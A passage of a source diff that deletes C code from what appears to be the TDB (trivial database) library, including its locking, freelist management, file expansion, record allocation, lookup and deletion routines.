(!probe && lck_type != F_SETLK) { - /* Ensure error code is set for log fun to examine. 
*/ - tdb->ecode = TDB_ERR_LOCK; - TDB_LOG((tdb, 5,"tdb_brlock failed (fd=%d) at offset %d rw_type=%d lck_type=%d\n", - tdb->fd, offset, rw_type, lck_type)); - } - /* Generic lock error. errno set by fcntl. - * EAGAIN is an expected return from non-blocking - * locks. */ - if (errno != EAGAIN) { - TDB_LOG((tdb, 5, "tdb_brlock failed (fd=%d) at offset %d rw_type=%d lck_type=%d: %s\n", - tdb->fd, offset, rw_type, lck_type, - strerror(errno))); - } - return TDB_ERRCODE(TDB_ERR_LOCK, -1); - } - return 0; -} - -/* lock a list in the database. list -1 is the alloc list */ -static int tdb_lock(TDB_CONTEXT *tdb, int list, int ltype) -{ - if (list < -1 || list >= (int)tdb->header.hash_size) { - TDB_LOG((tdb, 0,"tdb_lock: invalid list %d for ltype=%d\n", - list, ltype)); - return -1; - } - if (tdb->flags & TDB_NOLOCK) - return 0; - - /* Since fcntl locks don't nest, we do a lock for the first one, - and simply bump the count for future ones */ - if (tdb->locked[list+1].count == 0) { - if (tdb_brlock(tdb,FREELIST_TOP+4*list,ltype,F_SETLKW, 0)) { - TDB_LOG((tdb, 0,"tdb_lock failed on list %d ltype=%d (%s)\n", - list, ltype, strerror(errno))); - return -1; - } - tdb->locked[list+1].ltype = ltype; - } - tdb->locked[list+1].count++; - return 0; -} - -/* unlock the database: returns void because it's too late for errors. 
*/ - /* changed to return int it may be interesting to know there - has been an error --simo */ -static int tdb_unlock(TDB_CONTEXT *tdb, int list, - int ltype __attribute__((unused))) -{ - int ret = -1; - - if (tdb->flags & TDB_NOLOCK) - return 0; - - /* Sanity checks */ - if (list < -1 || list >= (int)tdb->header.hash_size) { - TDB_LOG((tdb, 0, "tdb_unlock: list %d invalid (%d)\n", list, tdb->header.hash_size)); - return ret; - } - - if (tdb->locked[list+1].count==0) { - TDB_LOG((tdb, 0, "tdb_unlock: count is 0\n")); - return ret; - } - - if (tdb->locked[list+1].count == 1) { - /* Down to last nested lock: unlock underneath */ - ret = tdb_brlock(tdb, FREELIST_TOP+4*list, F_UNLCK, F_SETLKW, 0); - } else { - ret = 0; - } - tdb->locked[list+1].count--; - - if (ret) - TDB_LOG((tdb, 0,"tdb_unlock: An error occurred unlocking!\n")); - return ret; -} - -/* This is based on the hash algorithm from gdbm */ -static uint32_t default_tdb_hash(TDB_DATA *key) -{ - uint32_t value; /* Used to compute the hash value. */ - uint32_t i; /* Used to cycle through random values. */ - - /* Set the initial value from the key size. */ - for (value = 0x238F13AF * key->dsize, i=0; i < key->dsize; i++) - value = (value + (key->dptr[i] << (i*5 % 24))); - - return (1103515243 * value + 12345); -} - -/* check for an out of bounds access - if it is out of bounds then - see if the database has been expanded by someone else and expand - if necessary - note that "len" is the minimum length needed for the db -*/ -static int tdb_oob(TDB_CONTEXT *tdb, tdb_off len, int probe) -{ - struct stat st; - if (len <= tdb->map_size) - return 0; - if (tdb->flags & TDB_INTERNAL) { - if (!probe) { - /* Ensure ecode is set for log fn. 
*/ - tdb->ecode = TDB_ERR_IO; - TDB_LOG((tdb, 0,"tdb_oob len %d beyond internal malloc size %d\n", - (int)len, (int)tdb->map_size)); - } - return TDB_ERRCODE(TDB_ERR_IO, -1); - } - - if (fstat(tdb->fd, &st) == -1) - return TDB_ERRCODE(TDB_ERR_IO, -1); - - if (st.st_size < (off_t)len) { - if (!probe) { - /* Ensure ecode is set for log fn. */ - tdb->ecode = TDB_ERR_IO; - TDB_LOG((tdb, 0,"tdb_oob len %d beyond eof at %d\n", - (int)len, (int)st.st_size)); - } - return TDB_ERRCODE(TDB_ERR_IO, -1); - } - - /* Unmap, update size, remap */ - if (tdb_munmap(tdb) == -1) - return TDB_ERRCODE(TDB_ERR_IO, -1); - tdb->map_size = st.st_size; - tdb_mmap(tdb); - return 0; -} - -/* write a lump of data at a specified offset */ -static int tdb_write(TDB_CONTEXT *tdb, tdb_off off, void *buf, tdb_len len) -{ - if (tdb_oob(tdb, off + len, 0) != 0) - return -1; - - if (tdb->map_ptr) - memcpy(off + (char *)tdb->map_ptr, buf, len); -#ifdef HAVE_PWRITE - else if (pwrite(tdb->fd, buf, len, off) != (ssize_t)len) { -#else - else if (lseek(tdb->fd, off, SEEK_SET) != (off_t)off - || write(tdb->fd, buf, len) != (off_t)len) { -#endif - /* Ensure ecode is set for log fn. */ - tdb->ecode = TDB_ERR_IO; - TDB_LOG((tdb, 0,"tdb_write failed at %d len=%d (%s)\n", - off, len, strerror(errno))); - return TDB_ERRCODE(TDB_ERR_IO, -1); - } - return 0; -} - -/* read a lump of data at a specified offset, maybe convert */ -static int tdb_read(TDB_CONTEXT *tdb,tdb_off off,void *buf,tdb_len len,int cv) -{ - if (tdb_oob(tdb, off + len, 0) != 0) - return -1; - - if (tdb->map_ptr) - memcpy(buf, off + (char *)tdb->map_ptr, len); -#ifdef HAVE_PREAD - else if (pread(tdb->fd, buf, len, off) != (off_t)len) { -#else - else if (lseek(tdb->fd, off, SEEK_SET) != (off_t)off - || read(tdb->fd, buf, len) != (off_t)len) { -#endif - /* Ensure ecode is set for log fn. 
*/ - tdb->ecode = TDB_ERR_IO; - TDB_LOG((tdb, 0,"tdb_read failed at %d len=%d (%s)\n", - off, len, strerror(errno))); - return TDB_ERRCODE(TDB_ERR_IO, -1); - } - if (cv) - convert(buf, len); - return 0; -} - -/* don't allocate memory: used in tdb_delete path. */ -static int tdb_key_eq(TDB_CONTEXT *tdb, tdb_off off, TDB_DATA key) -{ - char buf[64]; - uint32_t len; - - if (tdb_oob(tdb, off + key.dsize, 0) != 0) - return -1; - - if (tdb->map_ptr) - return !memcmp(off + (char*)tdb->map_ptr, key.dptr, key.dsize); - - while (key.dsize) { - len = key.dsize; - if (len > sizeof(buf)) - len = sizeof(buf); - if (tdb_read(tdb, off, buf, len, 0) != 0) - return -1; - if (memcmp(buf, key.dptr, len) != 0) - return 0; - key.dptr += len; - key.dsize -= len; - off += len; - } - return 1; -} - -/* read a lump of data, allocating the space for it */ -static char *tdb_alloc_read(TDB_CONTEXT *tdb, tdb_off offset, tdb_len len) -{ - char *buf; - - if (!(buf = talloc_size(tdb, len))) { - /* Ensure ecode is set for log fn. */ - tdb->ecode = TDB_ERR_OOM; - TDB_LOG((tdb, 0,"tdb_alloc_read malloc failed len=%d (%s)\n", - len, strerror(errno))); - return TDB_ERRCODE(TDB_ERR_OOM, buf); - } - if (tdb_read(tdb, offset, buf, len, 0) == -1) { - SAFE_FREE(buf); - return NULL; - } - return buf; -} - -/* read/write a tdb_off */ -static int ofs_read(TDB_CONTEXT *tdb, tdb_off offset, tdb_off *d) -{ - return tdb_read(tdb, offset, (char*)d, sizeof(*d), DOCONV()); -} -static int ofs_write(TDB_CONTEXT *tdb, tdb_off offset, tdb_off *d) -{ - tdb_off off = *d; - return tdb_write(tdb, offset, CONVERT(off), sizeof(*d)); -} - -/* read/write a record */ -static int rec_read(TDB_CONTEXT *tdb, tdb_off offset, struct list_struct *rec) -{ - if (tdb_read(tdb, offset, rec, sizeof(*rec),DOCONV()) == -1) - return -1; - if (TDB_BAD_MAGIC(rec)) { - /* Ensure ecode is set for log fn. 
*/ - tdb->ecode = TDB_ERR_CORRUPT; - TDB_LOG((tdb, 0,"rec_read bad magic 0x%x at offset=%d\n", rec->magic, offset)); - return TDB_ERRCODE(TDB_ERR_CORRUPT, -1); - } - return tdb_oob(tdb, rec->next+sizeof(*rec), 0); -} -static int rec_write(TDB_CONTEXT *tdb, tdb_off offset, struct list_struct *rec) -{ - struct list_struct r = *rec; - return tdb_write(tdb, offset, CONVERT(r), sizeof(r)); -} - -/* read a freelist record and check for simple errors */ -static int rec_free_read(TDB_CONTEXT *tdb, tdb_off off, struct list_struct *rec) -{ - if (tdb_read(tdb, off, rec, sizeof(*rec),DOCONV()) == -1) - return -1; - - if (rec->magic == TDB_MAGIC) { - /* this happens when a app is showdown while deleting a record - we should - not completely fail when this happens */ - TDB_LOG((tdb, 0,"rec_free_read non-free magic 0x%x at offset=%d - fixing\n", - rec->magic, off)); - rec->magic = TDB_FREE_MAGIC; - if (tdb_write(tdb, off, rec, sizeof(*rec)) == -1) - return -1; - } - - if (rec->magic != TDB_FREE_MAGIC) { - /* Ensure ecode is set for log fn. 
*/ - tdb->ecode = TDB_ERR_CORRUPT; - TDB_LOG((tdb, 0,"rec_free_read bad magic 0x%x at offset=%d\n", - rec->magic, off)); - return TDB_ERRCODE(TDB_ERR_CORRUPT, -1); - } - if (tdb_oob(tdb, rec->next+sizeof(*rec), 0) != 0) - return -1; - return 0; -} - -/* update a record tailer (must hold allocation lock) */ -static int update_tailer(TDB_CONTEXT *tdb, tdb_off offset, - const struct list_struct *rec) -{ - tdb_off totalsize; - - /* Offset of tailer from record header */ - totalsize = sizeof(*rec) + rec->rec_len; - return ofs_write(tdb, offset + totalsize - sizeof(tdb_off), - &totalsize); -} - -static tdb_off tdb_dump_record(TDB_CONTEXT *tdb, tdb_off offset) -{ - struct list_struct rec; - tdb_off tailer_ofs, tailer; - - if (tdb_read(tdb, offset, (char *)&rec, sizeof(rec), DOCONV()) == -1) { - printf("ERROR: failed to read record at %u\n", offset); - return 0; - } - - printf(" rec: offset=0x%08x next=0x%08x rec_len=%d key_len=%d data_len=%d full_hash=0x%x magic=0x%x\n", - offset, rec.next, rec.rec_len, rec.key_len, rec.data_len, rec.full_hash, rec.magic); - - tailer_ofs = offset + sizeof(rec) + rec.rec_len - sizeof(tdb_off); - if (ofs_read(tdb, tailer_ofs, &tailer) == -1) { - printf("ERROR: failed to read tailer at %u\n", tailer_ofs); - return rec.next; - } - - if (tailer != rec.rec_len + sizeof(rec)) { - printf("ERROR: tailer does not match record! 
tailer=%u totalsize=%u\n", - (unsigned int)tailer, (unsigned int)(rec.rec_len + sizeof(rec))); - } - return rec.next; -} - -static int tdb_dump_chain(TDB_CONTEXT *tdb, int i) -{ - tdb_off rec_ptr, top; - - top = TDB_HASH_TOP(i); - - if (tdb_lock(tdb, i, F_WRLCK) != 0) - return -1; - - if (ofs_read(tdb, top, &rec_ptr) == -1) - return tdb_unlock(tdb, i, F_WRLCK); - - if (rec_ptr) - printf("hash=%d\n", i); - - while (rec_ptr) { - rec_ptr = tdb_dump_record(tdb, rec_ptr); - } - - return tdb_unlock(tdb, i, F_WRLCK); -} - -void tdb_dump_all(TDB_CONTEXT *tdb) -{ - unsigned int i; - for (i=0;i<tdb->header.hash_size;i++) { - tdb_dump_chain(tdb, i); - } - printf("freelist:\n"); - tdb_dump_chain(tdb, -1); -} - -int tdb_printfreelist(TDB_CONTEXT *tdb) -{ - int ret; - long total_free = 0; - tdb_off offset, rec_ptr; - struct list_struct rec; - - if ((ret = tdb_lock(tdb, -1, F_WRLCK)) != 0) - return ret; - - offset = FREELIST_TOP; - - /* read in the freelist top */ - if (ofs_read(tdb, offset, &rec_ptr) == -1) { - tdb_unlock(tdb, -1, F_WRLCK); - return 0; - } - - printf("freelist top=[0x%08x]\n", rec_ptr ); - while (rec_ptr) { - if (tdb_read(tdb, rec_ptr, (char *)&rec, sizeof(rec), DOCONV()) == -1) { - tdb_unlock(tdb, -1, F_WRLCK); - return -1; - } - - if (rec.magic != TDB_FREE_MAGIC) { - printf("bad magic 0x%08x in free list\n", rec.magic); - tdb_unlock(tdb, -1, F_WRLCK); - return -1; - } - - printf("entry offset=[0x%08x], rec.rec_len = [0x%08x (%d)] (end = 0x%08x)\n", - rec_ptr, rec.rec_len, rec.rec_len, rec_ptr + rec.rec_len); - total_free += rec.rec_len; - - /* move to the next record */ - rec_ptr = rec.next; - } - printf("total rec_len = [0x%08x (%d)]\n", (int)total_free, - (int)total_free); - - return tdb_unlock(tdb, -1, F_WRLCK); -} - -/* Remove an element from the freelist. Must have alloc lock.
*/ -static int remove_from_freelist(TDB_CONTEXT *tdb, tdb_off off, tdb_off next) -{ - tdb_off last_ptr, i; - - /* read in the freelist top */ - last_ptr = FREELIST_TOP; - while (ofs_read(tdb, last_ptr, &i) != -1 && i != 0) { - if (i == off) { - /* We've found it! */ - return ofs_write(tdb, last_ptr, &next); - } - /* Follow chain (next offset is at start of record) */ - last_ptr = i; - } - TDB_LOG((tdb, 0,"remove_from_freelist: not on list at off=%d\n", off)); - return TDB_ERRCODE(TDB_ERR_CORRUPT, -1); -} - -/* Add an element into the freelist. Merge adjacent records if - neccessary. */ -static int tdb_free(TDB_CONTEXT *tdb, tdb_off offset, struct list_struct *rec) -{ - tdb_off right, left; - - /* Allocation and tailer lock */ - if (tdb_lock(tdb, -1, F_WRLCK) != 0) - return -1; - - /* set an initial tailer, so if we fail we don't leave a bogus record */ - if (update_tailer(tdb, offset, rec) != 0) { - TDB_LOG((tdb, 0, "tdb_free: upfate_tailer failed!\n")); - goto fail; - } - - /* Look right first (I'm an Australian, dammit) */ - right = offset + sizeof(*rec) + rec->rec_len; - if (right + sizeof(*rec) <= tdb->map_size) { - struct list_struct r; - - if (tdb_read(tdb, right, &r, sizeof(r), DOCONV()) == -1) { - TDB_LOG((tdb, 0, "tdb_free: right read failed at %u\n", right)); - goto left; - } - - /* If it's free, expand to include it. 
*/ - if (r.magic == TDB_FREE_MAGIC) { - if (remove_from_freelist(tdb, right, r.next) == -1) { - TDB_LOG((tdb, 0, "tdb_free: right free failed at %u\n", right)); - goto left; - } - rec->rec_len += sizeof(r) + r.rec_len; - } - } - -left: - /* Look left */ - left = offset - sizeof(tdb_off); - if (left > TDB_DATA_START(tdb->header.hash_size)) { - struct list_struct l; - tdb_off leftsize; - - /* Read in tailer and jump back to header */ - if (ofs_read(tdb, left, &leftsize) == -1) { - TDB_LOG((tdb, 0, "tdb_free: left offset read failed at %u\n", left)); - goto update; - } - left = offset - leftsize; - - /* Now read in record */ - if (tdb_read(tdb, left, &l, sizeof(l), DOCONV()) == -1) { - TDB_LOG((tdb, 0, "tdb_free: left read failed at %u (%u)\n", left, leftsize)); - goto update; - } - - /* If it's free, expand to include it. */ - if (l.magic == TDB_FREE_MAGIC) { - if (remove_from_freelist(tdb, left, l.next) == -1) { - TDB_LOG((tdb, 0, "tdb_free: left free failed at %u\n", left)); - goto update; - } else { - offset = left; - rec->rec_len += leftsize; - } - } - } - -update: - if (update_tailer(tdb, offset, rec) == -1) { - TDB_LOG((tdb, 0, "tdb_free: update_tailer failed at %u\n", offset)); - goto fail; - } - - /* Now, prepend to free list */ - rec->magic = TDB_FREE_MAGIC; - - if (ofs_read(tdb, FREELIST_TOP, &rec->next) == -1 || - rec_write(tdb, offset, rec) == -1 || - ofs_write(tdb, FREELIST_TOP, &offset) == -1) { - TDB_LOG((tdb, 0, "tdb_free record write failed at offset=%d\n", offset)); - goto fail; - } - - /* And we're done. */ - tdb_unlock(tdb, -1, F_WRLCK); - return 0; - - fail: - tdb_unlock(tdb, -1, F_WRLCK); - return -1; -} - - -/* expand a file. 
we prefer to use ftruncate, as that is what posix - says to use for mmap expansion */ -static int expand_file(TDB_CONTEXT *tdb, tdb_off size, tdb_off addition) -{ - char buf[1024]; -#ifdef HAVE_FTRUNCATE_EXTEND - if (ftruncate(tdb->fd, size+addition) != 0) { - TDB_LOG((tdb, 0, "expand_file ftruncate to %d failed (%s)\n", - size+addition, strerror(errno))); - return -1; - } -#else - char b = 0; - -#ifdef HAVE_PWRITE - if (pwrite(tdb->fd, &b, 1, (size+addition) - 1) != 1) { -#else - if (lseek(tdb->fd, (size+addition) - 1, SEEK_SET) != (off_t)(size+addition) - 1 || - write(tdb->fd, &b, 1) != 1) { -#endif - TDB_LOG((tdb, 0, "expand_file to %d failed (%s)\n", - size+addition, strerror(errno))); - return -1; - } -#endif - - /* now fill the file with something. This ensures that the file isn't sparse, which would be - very bad if we ran out of disk. This must be done with write, not via mmap */ - memset(buf, 0x42, sizeof(buf)); - while (addition) { - int n = addition>sizeof(buf)?sizeof(buf):addition; -#ifdef HAVE_PWRITE - int ret = pwrite(tdb->fd, buf, n, size); -#else - int ret; - if (lseek(tdb->fd, size, SEEK_SET) != (off_t)size) - return -1; - ret = write(tdb->fd, buf, n); -#endif - if (ret != n) { - TDB_LOG((tdb, 0, "expand_file write of %d failed (%s)\n", - n, strerror(errno))); - return -1; - } - addition -= n; - size += n; - } - return 0; -} - - -/* expand the database at least size bytes by expanding the underlying - file and doing the mmap again if necessary */ -static int tdb_expand(TDB_CONTEXT *tdb, tdb_off size) -{ - struct list_struct rec; - tdb_off offset; - - if (tdb_lock(tdb, -1, F_WRLCK) == -1) { - TDB_LOG((tdb, 0, "lock failed in tdb_expand\n")); - return -1; - } - - /* must know about any previous expansions by another process */ - tdb_oob(tdb, tdb->map_size + 1, 1); - - /* always make room for at least 10 more records, and round - the database up to a multiple of TDB_PAGE_SIZE */ - size = TDB_ALIGN(tdb->map_size + size*10, TDB_PAGE_SIZE) - 
tdb->map_size; - - if (!(tdb->flags & TDB_INTERNAL)) - tdb_munmap(tdb); - - /* - * We must ensure the file is unmapped before doing this - * to ensure consistency with systems like OpenBSD where - * writes and mmaps are not consistent. - */ - - /* expand the file itself */ - if (!(tdb->flags & TDB_INTERNAL)) { - if (expand_file(tdb, tdb->map_size, size) != 0) - goto fail; - } - - tdb->map_size += size; - - if (tdb->flags & TDB_INTERNAL) { - char *new_map_ptr = talloc_realloc_size(tdb, tdb->map_ptr, - tdb->map_size); - if (!new_map_ptr) { - tdb->map_size -= size; - goto fail; - } - tdb->map_ptr = new_map_ptr; - } else { - /* - * We must ensure the file is remapped before adding the space - * to ensure consistency with systems like OpenBSD where - * writes and mmaps are not consistent. - */ - - /* We're ok if the mmap fails as we'll fallback to read/write */ - tdb_mmap(tdb); - } - - /* form a new freelist record */ - memset(&rec,'\0',sizeof(rec)); - rec.rec_len = size - sizeof(rec); - - /* link it into the free list */ - offset = tdb->map_size - size; - if (tdb_free(tdb, offset, &rec) == -1) - goto fail; - - tdb_unlock(tdb, -1, F_WRLCK); - return 0; - fail: - tdb_unlock(tdb, -1, F_WRLCK); - return -1; -} - - -/* - the core of tdb_allocate - called when we have decided which - free list entry to use - */ -static tdb_off tdb_allocate_ofs(TDB_CONTEXT *tdb, tdb_len length, tdb_off rec_ptr, - struct list_struct *rec, tdb_off last_ptr) -{ - struct list_struct newrec; - tdb_off newrec_ptr; - - memset(&newrec, '\0', sizeof(newrec)); - - /* found it - now possibly split it up */ - if (rec->rec_len > length + MIN_REC_SIZE) { - /* Length of left piece */ - length = TDB_ALIGN(length, TDB_ALIGNMENT); - - /* Right piece to go on free list */ - newrec.rec_len = rec->rec_len - (sizeof(*rec) + length); - newrec_ptr = rec_ptr + sizeof(*rec) + length; - - /* And left record is shortened */ - rec->rec_len = length; - } else { - newrec_ptr = 0; - } - - /* Remove allocated record from the 
free list */ - if (ofs_write(tdb, last_ptr, &rec->next) == -1) { - return 0; - } - - /* Update header: do this before we drop alloc - lock, otherwise tdb_free() might try to - merge with us, thinking we're free. - (Thanks Jeremy Allison). */ - rec->magic = TDB_MAGIC; - if (rec_write(tdb, rec_ptr, rec) == -1) { - return 0; - } - - /* Did we create new block? */ - if (newrec_ptr) { - /* Update allocated record tailer (we - shortened it). */ - if (update_tailer(tdb, rec_ptr, rec) == -1) { - return 0; - } - - /* Free new record */ - if (tdb_free(tdb, newrec_ptr, &newrec) == -1) { - return 0; - } - } - - /* all done - return the new record offset */ - return rec_ptr; -} - -/* allocate some space from the free list. The offset returned points - to a unconnected list_struct within the database with room for at - least length bytes of total data - - 0 is returned if the space could not be allocated - */ -static tdb_off tdb_allocate(TDB_CONTEXT *tdb, tdb_len length, - struct list_struct *rec) -{ - tdb_off rec_ptr, last_ptr, newrec_ptr; - struct { - tdb_off rec_ptr, last_ptr; - tdb_len rec_len; - } bestfit = { 0, 0, 0 }; - - if (tdb_lock(tdb, -1, F_WRLCK) == -1) - return 0; - - /* Extra bytes required for tailer */ - length += sizeof(tdb_off); - - again: - last_ptr = FREELIST_TOP; - - /* read in the freelist top */ - if (ofs_read(tdb, FREELIST_TOP, &rec_ptr) == -1) - goto fail; - - bestfit.rec_ptr = 0; - - /* - this is a best fit allocation strategy. Originally we used - a first fit strategy, but it suffered from massive fragmentation - issues when faced with a slowly increasing record size. 
- */ - while (rec_ptr) { - if (rec_free_read(tdb, rec_ptr, rec) == -1) { - goto fail; - } - - if (rec->rec_len >= length) { - if (bestfit.rec_ptr == 0 || - rec->rec_len < bestfit.rec_len) { - bestfit.rec_len = rec->rec_len; - bestfit.rec_ptr = rec_ptr; - bestfit.last_ptr = last_ptr; - /* consider a fit to be good enough if we aren't wasting more than half the space */ - if (bestfit.rec_len < 2*length) { - break; - } - } - } - - /* move to the next record */ - last_ptr = rec_ptr; - rec_ptr = rec->next; - } - - if (bestfit.rec_ptr != 0) { - if (rec_free_read(tdb, bestfit.rec_ptr, rec) == -1) { - goto fail; - } - - newrec_ptr = tdb_allocate_ofs(tdb, length, bestfit.rec_ptr, rec, bestfit.last_ptr); - tdb_unlock(tdb, -1, F_WRLCK); - return newrec_ptr; - } - - /* we didn't find enough space. See if we can expand the - database and if we can then try again */ - if (tdb_expand(tdb, length + sizeof(*rec)) == 0) - goto again; - fail: - tdb_unlock(tdb, -1, F_WRLCK); - return 0; -} - -/* initialise a new database with a specified hash size */ -static int tdb_new_database(TDB_CONTEXT *tdb, int hash_size) -{ - struct tdb_header *newdb; - int size, ret = -1; - - /* We make it up in memory, then write it out if not internal */ - size = sizeof(struct tdb_header) + (hash_size+1)*sizeof(tdb_off); - if (!(newdb = talloc_zero_size(tdb, size))) - return TDB_ERRCODE(TDB_ERR_OOM, -1); - - /* Fill in the header */ - newdb->version = TDB_VERSION; - newdb->hash_size = hash_size; - if (tdb->flags & TDB_INTERNAL) { - tdb->map_size = size; - tdb->map_ptr = (char *)newdb; - memcpy(&tdb->header, newdb, sizeof(tdb->header)); - /* Convert the `ondisk' version if asked. */ - CONVERT(*newdb); - return 0; - } - if (lseek(tdb->fd, 0, SEEK_SET) == -1) - goto fail; - - if (ftruncate(tdb->fd, 0) == -1) - goto fail; - - /* This creates an endian-converted header, as if read from disk */ - CONVERT(*newdb); - memcpy(&tdb->header, newdb, sizeof(tdb->header)); - /* Don't endian-convert the magic food! 
*/ - memcpy(newdb->magic_food, TDB_MAGIC_FOOD, strlen(TDB_MAGIC_FOOD)+1); - if (write(tdb->fd, newdb, size) != size) - ret = -1; - else - ret = 0; - - fail: - SAFE_FREE(newdb); - return ret; -} - -/* Returns 0 on fail. On success, return offset of record, and fills - in rec */ -static tdb_off tdb_find(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash, - struct list_struct *r) -{ - tdb_off rec_ptr; - - /* read in the hash top */ - if (ofs_read(tdb, TDB_HASH_TOP(hash), &rec_ptr) == -1) - return 0; - - /* keep looking until we find the right record */ - while (rec_ptr) { - if (rec_read(tdb, rec_ptr, r) == -1) - return 0; - - if (!TDB_DEAD(r) && hash==r->full_hash && key.dsize==r->key_len) { - /* a very likely hit - read the key */ - int cmp = tdb_key_eq(tdb, rec_ptr + sizeof(*r), key); - if (cmp < 0) - return 0; - else if (cmp > 0) - return rec_ptr; - } - rec_ptr = r->next; - } - return TDB_ERRCODE(TDB_ERR_NOEXIST, 0); -} - -/* As tdb_find, but if you succeed, keep the lock */ -static tdb_off tdb_find_lock_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash, int locktype, - struct list_struct *rec) -{ - uint32_t rec_ptr; - - if (tdb_lock(tdb, BUCKET(hash), locktype) == -1) - return 0; - if (!(rec_ptr = tdb_find(tdb, key, hash, rec))) - tdb_unlock(tdb, BUCKET(hash), locktype); - return rec_ptr; -} - -enum TDB_ERROR tdb_error(TDB_CONTEXT *tdb) -{ - return tdb->ecode; -} - -static struct tdb_errname { - enum TDB_ERROR ecode; const char *estring; -} emap[] = { {TDB_SUCCESS, "Success"}, - {TDB_ERR_CORRUPT, "Corrupt database"}, - {TDB_ERR_IO, "IO Error"}, - {TDB_ERR_LOCK, "Locking error"}, - {TDB_ERR_OOM, "Out of memory"}, - {TDB_ERR_EXISTS, "Record exists"}, - {TDB_ERR_NOLOCK, "Lock exists on other keys"}, - {TDB_ERR_NOEXIST, "Record does not exist"} }; - -/* Error string for the last tdb error */ -const char *tdb_errorstr(TDB_CONTEXT *tdb) -{ - uint32_t i; - for (i = 0; i < sizeof(emap) / sizeof(struct tdb_errname); i++) - if (tdb->ecode == emap[i].ecode) - return 
emap[i].estring; - return "Invalid error code"; -} - -/* update an entry in place - this only works if the new data size - is <= the old data size and the key exists. - on failure return -1. -*/ - -static int tdb_update_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash, TDB_DATA dbuf) -{ - struct list_struct rec; - tdb_off rec_ptr; - - /* find entry */ - if (!(rec_ptr = tdb_find(tdb, key, hash, &rec))) - return -1; - - /* must be long enough key, data and tailer */ - if (rec.rec_len < key.dsize + dbuf.dsize + sizeof(tdb_off)) { - tdb->ecode = TDB_SUCCESS; /* Not really an error */ - return -1; - } - - if (tdb_write(tdb, rec_ptr + sizeof(rec) + rec.key_len, - dbuf.dptr, dbuf.dsize) == -1) - return -1; - - if (dbuf.dsize != rec.data_len) { - /* update size */ - rec.data_len = dbuf.dsize; - return rec_write(tdb, rec_ptr, &rec); - } - - return 0; -} - -/* find an entry in the database given a key */ -/* If an entry doesn't exist tdb_err will be set to - * TDB_ERR_NOEXIST. If a key has no data attached - * then the TDB_DATA will have zero length but - * a non-zero pointer - */ - -TDB_DATA tdb_fetch(TDB_CONTEXT *tdb, TDB_DATA key) -{ - tdb_off rec_ptr; - struct list_struct rec; - TDB_DATA ret; - uint32_t hash; - - /* find which hash bucket it is in */ - hash = tdb->hash_fn(&key); - if (!(rec_ptr = tdb_find_lock_hash(tdb,key,hash,F_RDLCK,&rec))) - return tdb_null; - - ret.dptr = tdb_alloc_read(tdb, rec_ptr + sizeof(rec) + rec.key_len, - rec.data_len); - ret.dsize = rec.data_len; - tdb_unlock(tdb, BUCKET(rec.full_hash), F_RDLCK); - return ret; -} - -/* check if an entry in the database exists - - note that 1 is returned if the key is found and 0 is returned if not found - this doesn't match the conventions in the rest of this module, but is - compatible with gdbm -*/ -static int tdb_exists_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash) -{ - struct list_struct rec; - - if (tdb_find_lock_hash(tdb, key, hash, F_RDLCK, &rec) == 0) - return 0; - tdb_unlock(tdb, 
BUCKET(rec.full_hash), F_RDLCK); - return 1; -} - -int tdb_exists(TDB_CONTEXT *tdb, TDB_DATA key) -{ - uint32_t hash = tdb->hash_fn(&key); - return tdb_exists_hash(tdb, key, hash); -} - -/* record lock stops delete underneath */ -static int lock_record(TDB_CONTEXT *tdb, tdb_off off) -{ - return off ? tdb_brlock(tdb, off, F_RDLCK, F_SETLKW, 0) : 0; -} -/* - Write locks override our own fcntl readlocks, so check it here. - Note this is meant to be F_SETLK, *not* F_SETLKW, as it's not - an error to fail to get the lock here. -*/ - -static int write_lock_record(TDB_CONTEXT *tdb, tdb_off off) -{ - struct tdb_traverse_lock *i; - for (i = &tdb->travlocks; i; i = i->next) - if (i->off == off) - return -1; - return tdb_brlock(tdb, off, F_WRLCK, F_SETLK, 1); -} - -/* - Note this is meant to be F_SETLK, *not* F_SETLKW, as it's not - an error to fail to get the lock here. -*/ - -static int write_unlock_record(TDB_CONTEXT *tdb, tdb_off off) -{ - return tdb_brlock(tdb, off, F_UNLCK, F_SETLK, 0); -} -/* fcntl locks don't stack: avoid unlocking someone else's */ -static int unlock_record(TDB_CONTEXT *tdb, tdb_off off) -{ - struct tdb_traverse_lock *i; - uint32_t count = 0; - - if (off == 0) - return 0; - for (i = &tdb->travlocks; i; i = i->next) - if (i->off == off) - count++; - return (count == 1 ? 
tdb_brlock(tdb, off, F_UNLCK, F_SETLKW, 0) : 0); -} - -/* actually delete an entry in the database given the offset */ -static int do_delete(TDB_CONTEXT *tdb, tdb_off rec_ptr, struct list_struct*rec) -{ - tdb_off last_ptr, i; - struct list_struct lastrec; - - if (tdb->read_only) return -1; - - if (write_lock_record(tdb, rec_ptr) == -1) { - /* Someone traversing here: mark it as dead */ - rec->magic = TDB_DEAD_MAGIC; - return rec_write(tdb, rec_ptr, rec); - } - if (write_unlock_record(tdb, rec_ptr) != 0) - return -1; - - /* find previous record in hash chain */ - if (ofs_read(tdb, TDB_HASH_TOP(rec->full_hash), &i) == -1) - return -1; - for (last_ptr = 0; i != rec_ptr; last_ptr = i, i = lastrec.next) - if (rec_read(tdb, i, &lastrec) == -1) - return -1; - - /* unlink it: next ptr is at start of record. */ - if (last_ptr == 0) - last_ptr = TDB_HASH_TOP(rec->full_hash); - if (ofs_write(tdb, last_ptr, &rec->next) == -1) - return -1; - - /* recover the space */ - if (tdb_free(tdb, rec_ptr, rec) == -1) - return -1; - return 0; -} - -/* Uses traverse lock: 0 = finish, -1 = error, other = record offset */ -static int tdb_next_lock(TDB_CONTEXT *tdb, struct tdb_traverse_lock *tlock, - struct list_struct *rec) -{ - int want_next = (tlock->off != 0); - - /* Lock each chain from the start one. */ - for (; tlock->hash < tdb->header.hash_size; tlock->hash++) { - - /* this is an optimisation for the common case where - the hash chain is empty, which is particularly - common for the use of tdb with ldb, where large - hashes are used. In that case we spend most of our - time in tdb_brlock(), locking empty hash chains. - - To avoid this, we do an unlocked pre-check to see - if the hash chain is empty before starting to look - inside it. If it is empty then we can avoid that - hash chain. If it isn't empty then we can't believe - the value we get back, as we read it without a - lock, so instead we get the lock and re-fetch the - value below. 
